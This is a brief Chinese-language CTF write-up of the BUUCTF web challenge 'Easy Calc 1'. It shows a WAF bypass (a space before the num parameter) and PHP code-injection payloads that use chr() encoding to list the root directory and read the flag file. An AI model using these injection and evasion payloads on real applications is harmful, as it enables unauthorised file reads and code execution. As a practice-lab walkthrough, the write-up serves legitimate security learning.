BUUCTF--WEB Easy Calc 1

Easy Calc 1

打开题目,我们查看源码提示我们上了WAF并看到有一个url:?calc.php
BUUCTF--WEB Easy Calc 1_第1张图片于是我们访问这个url看到源码,知道其禁用了什么
BUUCTF--WEB Easy Calc 1_第2张图片
写特殊字符,这个WAF都会报错,于是我们开始一波bypass,最后发现? num=phpinfo(); 在num前加空格可以绕过此WAF
BUUCTF--WEB Easy Calc 1_第3张图片
由于该WAF禁用了/ 于是我们列出指定路径中的文件和目录并找到对应的ASSCII码:? num=1;var_dump(scandir(chr(47)))
BUUCTF--WEB Easy Calc 1_第4张图片
构造url:? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
读出flag值
在这里插入图片描述

你可能感兴趣的:(CTF)